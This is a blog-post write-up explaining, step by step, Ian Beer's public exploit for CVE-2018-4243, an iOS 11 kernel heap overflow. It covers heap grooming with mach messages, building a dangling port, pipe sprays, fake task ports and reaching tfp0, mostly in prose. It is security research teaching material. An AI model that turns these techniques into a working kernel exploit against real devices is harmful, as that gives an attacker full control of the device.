MustachiOS: Covering Ian Beer's exploit techniques for getvolattrlist bug (iOS 11-11.3.1)

Introduction

CVE-2018-4243 is a kernel heap overflow reported by Ian Beer. Along with a write-up describing the vulnerability, Ian Beer published an exploit for this bug, that involves some awesome exploitation techniques in order to reach tfp0. In this write-up, we'll aim at covering those techniques in great detail.

Without further ado, let's dive in!

All credits for exploitation techniques, vulnerability, etc... exposed here belong to Ian Beer from Google Project Zero.

PS: In this blog post, 4k pages are assumed

Oh my VFS!

VFS stands for Virtual File-System. It's a file-system abstraction layer, whose purpose is to abstract file-system specific operations to the rest of the kernel.
The bug occurs when the kernel needs to handle a call to the fgetattrlist system call, which allows us to retrieve attributes of file-system objects:

fgetattrlist(int fd, struct attrlist *attrList, void *attrBuf,
size_t attrBufSize, unsigned long options);

attrList is an input parameter, which aims to specify which attributes we're interested to get.
attrBuf is the output buffer that will contain our object attributes.
attrBufSize is, as it name implies, the size of the attribute buffer. This size is expected to depend on the number of attributes that were specified through the attrList parameter.

The greater the number of attributes specified, the longer will be the length of the expected attribute buffer. But what if we choose not to follow that expectation? In particular, let's see what happens if we provide fgetattrlist an attrBufSize smaller than expected.

When handling the fgetattrlist syscall, the kernel will fall through the getvolattrlist function:

Here, we allocate ab.allocated bytes on the heap, and we make sure that the bufferSize (=attrBufSize) is not larger than needed (l.29), by calculating the minimum between the size expected (fixedsize + varsize), and the size provided as argument (bufferSize).
Now if we continue exploring the function a bit further, we'll eventually stumble upon this:

Interesting! If bufferSize < sizeof(ab.actual) + sizeof(uint32_t), we'll overflow our freshly allocated chunk on the heap by:

sizeof(ab.actual) + sizeof(uint32_t) - bufferSize bytes

Respectively, given a bufferSize = 0x10, we'll get an overflow of:

0x14 + 0x4 - 0x10 = 0x8 bytes :)

It worth noting that, in order to reach the code path cited, we must ensure that the attrList provided fulfills the following requirement: (attrList->fileattr || attrList->dirattr || attrList->forkattr) == 0

The last 0x8 bytes of ab.actual are no other than the attrList->dirattr and attrList->forkattr fields that we provide through the attrlist parameter of fgetattrlist. It means that we can overflow the chunk following ab.allocated by 8 NULL bytes.

But, hey, is it really exploitable?

If only we could turn this hard-to-exploit 8 bytes overflow, into a much more convenient primitive, say a UaF, that'd be great.

Luckily enough, our beloved struct ipc_port seems like the perfect structure to overwrite:

As ipc_object_bits is a typedef to an unsigned int, we see that, in case we could manage to have our victim buffer overwrite the first 8 bytes of a struct ipc_port with NULL bytes, we could then set the port's io_references (the port's reference count) and io_bits to 0, This would drop the port's reference count, and allow us to get a dangling port, paving our way to a much more easier to exploit primitive.

Background

The Zone Allocator will be the subject for another blogpost. But let's briefly resume some of its properties:

Each zone have 4 page lists:

all_foreign: for pages that does not belong to zone_map.
all_free: for pages that contains only free objects.
intermediate: for pages that contains free and allocated objects.
all_used: for pages that contains only allocated objects.

When we want to allocate an object from a zone, the zone's page lists are checked in this specific order:

any_free_foreign → intermediate → all_free

any_free_foreign

intermediate

When all page lists are empty for a specific zone, the zone allocator will feed the zone's all_free page list by a certain amount of pages (the number of pages allocated is zone specific, depends on zone.alloc_size). Each time a page is added to the zone's all_free page list, it is consecutive to the previous pages allocated. In other words, when pages are allocated and added to all_free, they are consecutive.

When pages are allocated from zone_map (which contains enough space for us in this exploit (384MB)), pages do not contain inline metadata (struct zone_page_metadata) at the beginning of the page.

When a page (or a batch of pages) is added to the all_free page list, the freelist, and thus the order of allocation of objects from this page, is semi-randomized. That ensures that the order of allocation of objects cannot be predicted. For example, this is how will look a page's freelist right after it is freshly allocated, and put at the tail of the all_free page list:

And as such, this will be the allocation order of objects from this page:

Heap gymnastics

Enough talking, now it's fun time :)

Remember, we want our kalloc.16 allocation from getvolattrlist to overwrite an ipc_port.

Here are the steps toward ~~victory~~ handy dangling mach port:

Filling holes: first, we empty (or almost empty) the intermediate page list by allocating lots of chunks from the kalloc.16 zone to fill the holes. This way, we ensure that all further page allocations from the kalloc.16 zone will be consecutive. We do the same for the ipc port zone.

Spray: Then, the logic is simple: we'll allocate mach ports, and 16-bytes chunks in such a way that pages from kalloc.16 and ipc port zones are criss-crossing. We'll see how.

Overflow: Afterwards, "what remains" to do, is to free the rightmost object from a kalloc.16 page (victim page), call our fgetattrlist syscall, and cross fingers for it to allocate our recently freed chunk, so that it overflows the mach port next to it, which is the leftmost port from the juxtaposed ipc port page, on the right of the victim page.

Filling holes

In order to allocate chunks from kalloc.16, we'll use mach messages as our allocation primitive.

More precisely, we'll send complex mach messages with ool port descriptors to a port we just allocate specifically for this purpose (and to which we give ourself a send right, of course).

In fact, when mach messages are sent through the mach_msg syscall, they are handled by mach_msg_send. Here is the call graph (only the relevant parts):

In ipc_kmsg_copyin_body, we'll iterate over each of the MACH_MSG_OOL_PORTS_DESCRIPTORs contained in the message body, and call ipc_kmsg_copyin_ool_ports_descriptor for each descriptor:

And this is where the allocation will occur:

In other words, we control the length of the allocation with the port descriptor's count, and the number of allocation with the message body's msgh_descriptor_count. Nice primitive!

By sending mach messages with enough descriptors and appropriate count equaling 0x10 / sizeof(mach_port_name_t), we'll easily fill the holes for the kalloc.16 zone.

As of the ipc port zone, filling the holes is as easy as allocating ports with mach_port_allocate.

Spray

Now that we know for sure (thanks to the previous phase) that the ipc port and kalloc.16 zone's page lists are empty (or almost empty), we'll start spraying the heap.
It turns out that, for each "zone refill", 3 pages will be allocated for the ipc port zone, and only one for the kalloc.16 one. That means that, each time the ipc port zone is empty, the zone allocator will allocate 3 consecutive pages and add this set of pages to its all_free page list.
Thus, after each ipc port's "zone refill", the number of new ipc ports that will be available for allocation is:

(PAGE_SIZE * 3) / sizeof(struct ipc_port) = 0x49

Likewise, after each kalloc.16 "zone refill", the number of new objects that will be available for allocation is:

PAGE_SIZE / 0x10 = 0x100

Our heap strategy will be the following:

For a while (we'll allocate a total of 960K):

Allocate 0x49 mach ports
Allocate 0x100 kalloc.16 chunks.

And this will be the approximate layout of the allocations we just made, on the heap:

Actually, we would ideally want to free some kalloc.16 chunks (for example, half of the number we allocated), so that our next kalloc.16 allocations would fall into a page, first in the intermediate page list, and surrounded by ipc port's pages.

After that, we would repeatedly:

Free a random object on this page
Issue a malicious call to fgetattrlist

until this is the rightmost object on the page that is being freed, then reallocated and abused by fgetattrlist.

But if you remember what we said in the previous background section, you sure know that this is how intermediate ipc port pages would look like:

Because of the freelists randomization, innermost objects are always allocated first, and outermost objects are always the last to be allocated.

In our case, this poses quite a big problem, because instead of overflowing an ipc_port, we will overflow a free kalloc.16 chunk, and guess what, free chunks contains pointers to the next free element in the freelist, as their very first bytes. Overwriting this pointer would result in an instant kernel panic when the corrupted free chunk would be reallocated.

To overcome this annoying hurdle, we'll need to reverse the freelists order for kalloc.16 chunks.
By freeing all the kalloc.16 chunks in the same order we allocated them, we are simply reversing the objects allocation order.

Here's what we'll actually do:

Step 1: Free all the kalloc.16 chunks, in the same order we allocated them.
Step 2: Reallocate half of the kalloc.16 chunks we just freed in Step 1.

Step 1:

After this step, we'll have free kalloc.16 pages (members of all_free page list), surrounded by ipc port pages:

Step 2:

After Step 2, we'll have a kalloc.16 page, member of the intermediate page list, surrounded by ipc port pages.

This is much better, because if we free and allocate objects from the page illustrated above, while paying attention to never free/allocate those that are the most freshly allocated (because there is a higher probability that they're near free objects), we will eventually free and abuse the rightmost kalloc.16, and we will win.

One important thing to note, is that, because we use ool mach port descriptors as our allocation primitive for kalloc.16 chunks, we stay safe when one of them is being overflown with NULL bytes, because a NULL pointer is a legit value for those port descriptors (pointers to mach ports) on the heap.

So, as long as we don't overflow a free chunk, we are fine.

Overflow

Now, starting from the 20th kalloc.16 chunk before the last kalloc.16 chunk allocated, (last allocated chunk - 20), and in a last-to-first allocated direction, we free a chunk, perform a malicious call to fgetattrlist, and finally check if the ipc_port juxtaposing our intermediate page to the right was corrupted. Actually, we don't know which port is this port at the right of that intermediate page we're playing with. So, in order to check if this port was corrupted, we'll in reality check for the ipc ports surrounding the intermediate page we're freeing and reallocating from, to check if one of the ports there was corrupted. If so, we successfully corrupted the leftmost port on the next ipc port page, and that's a big win!

In order to check if an ipc_port got its first 8 bytes overwritten with NULL bytes, there is an easy way: mach_port_kobject. Calling this function with appropriate parameters, on a port whose ip_object.io_bits is set to 0, will return KERN_INVALID_RIGHT. In simple words, that means calling this function on our corrupted port will return KERN_INVALID_RIGHT, instead of the KERN_SUCCESS we should expect.
This is how our intermediate page that we're focused on will look like, after our successful overflow:

AARbitrary reads

In our road toward tfp0, we are now looking for a robust arbitrary kernel read primitive. The way to achieve this goal, is to:

Turn our overflow into a UaF
Leverage this UaF to build a fake task port
Read ~~not so~~ arbitrary kernel addresses using pid_for_task on our fake task port.

sudo make_me_a_dangling_port

We said that we wanted to turn our ugly bug into a UaF. This is happening!
It's important that we free the port, but keep the ipc_entry for this port our space. This result can be achieved by calling mach_port_set_attributes on our corrupted port:

Along with that, we'll also free all the ports we allocated in the recent Spray phase, excepted 3 pages, away from the page where our corrupted port lies.

Canary port

We then choose a port, approximately in the middle of the 3 ipc port's pages we deliberately refrained ourselves from freeing: this will be our canary port.

As we'll soon want to spray the heap, we don't forget to trigger the Garbage Collector, so that free zone pages are given back to the Page Allocator. This is because we want ipc port pages to be reallocated by a different zone, to get interesting type confusion overwrites.

Then, to leak the canary port's address, we'll now spray the heap again with ool port descriptors as our allocation primitive. We'll spray the heap with page-sized ool descriptor buffers, where the value at offset 0x90 (corresponding to the offset of ip_context in a struct ipc_port) of the page equals the canary port's name. And because our dangling port is at the beginning of a page, this is perfect for us. Hopefully, we'll overwrite the dangling port with our ool port descriptors buffer, which means that our dangling port's ip_context will now contain the value of the canary port.

Now, by issuing a call to mach_port_get_context, the canary port's address is ours :)

Pipes considered useful

Overwriting our dangling port with ool port descriptor arrays is great, but it's rather limited: we can only write NULL bytes and mach port addresses. Instead, we want to have a more fine-tuned control over the dangling port and its fields. That's where pipes will come to the rescue.
Pipes allows us to have to have total control over their content. We can read/write to them without the need to reallocate for each rewrite. In this exploit, we'll make use of page sized pipes.

Fake task port

Here, we want our dangling port to become a task port, which points to (through kdata.kobject) a fake task (with fake task->bsd_info).
We'll choose the page that'll contain our fake task to be:

pipe_target_kaddr = PAGE_ALIGN(canary port's address) + 0x10000

In order to overwrite both our dangling port, and the page that'll contain our fake task, we must spray the heap once again. Thus, we'll now iterate over every page we just sprayed in the Canary port section (those in purple). As long as we haven't reached our dangling port, we'll simply leave a page containing an ool port descriptors array there (like it already was). As soon as we reach the dangling port, we spray the heap with a specially crafted 4k (page size) pipe, until both the dangling port and the pipe_target_kaddr page are overwritten with our pipe.
The pipe we're spraying the heap with, contains a fake task port at the very beginning. This way, we're assured to overwrite our dangling port, that for sure, is page-aligned. Moreover, it contains a fake struct task after the fake task port, at offset 0x100, and controlling it's bsd_info field allows us to read kernel memory by calling to pid_for_task on our fake task port (the dangling port):

This is an approximate view of how the heap will look like, after we finished spraying the new pipe object:

pid_for_task

Each time we call pid_for_task on our fake task port, dangling_port->kdata.kobject->bsd_info->p_pid will be returned (see pid_for_task), given the fact that 0x10 corresponds to the offset of the p_pid field in bsd_info. Thus, the function will effectively return the content of our arbitrary address when issuing a call to pid_for_task on our fake task port.

Task for PID 0

Let's do a quick recapitulation:

We now have full control over our dangling port (which is a task port) and it's fields.
We have a full control over our fake task and it's fields.

Now, the ultimate goal is to build a fake kernel task port. In order to build it, we need:

the kernel's vm_map
the kernel's ipc_space

ipc_space

Finding the kernel's ipc_space is quite simple. First we craft a mach message that we send to the canary port:

What is special about this message, is that we embed to it a SEND right to the host port, by the means of the msgh_local_port field.
Then, we retrieve the host port by reading canary_port->ip_messages.messages.ikmq_base->ikm_header->msgh_local_port through our Kernel Read primitive.
By the time we got the host port, we read its ip_receiver field, which contains the kernel's ipc_space!

vm_map

If you remember, we said previously that the ipc port zone allocates 3 pages for each zone refill.
The beautiful thing here, is that the kernel task's port (the original one) lies in the same 3 pages than the host port. And we're lucky enough to have retrieved the host port in the previous section. So we can just scan the 3 pages for the kernel task port, and read kernel_task_port->kdata.kobject->bsd_info->vm_map, which corresponds to the kernel's vm_map.

Now, we just bake our freshly found ipc_space and vm_map into our fake task and fake task port. And that's it. We can just profit from our new fake tfp0!

PS: For any remark, correction, or question, please don't hesitate to reach me on twitter @4ldebaran

References

Acknowledgements:

Ian Beer for his answers to my emails
ghozt for proofreading my article
elvanderb for proofreading my article

MustachiOS

Monday, July 30, 2018

Covering Ian Beer's exploit techniques for getvolattrlist bug (iOS 11-11.3.1)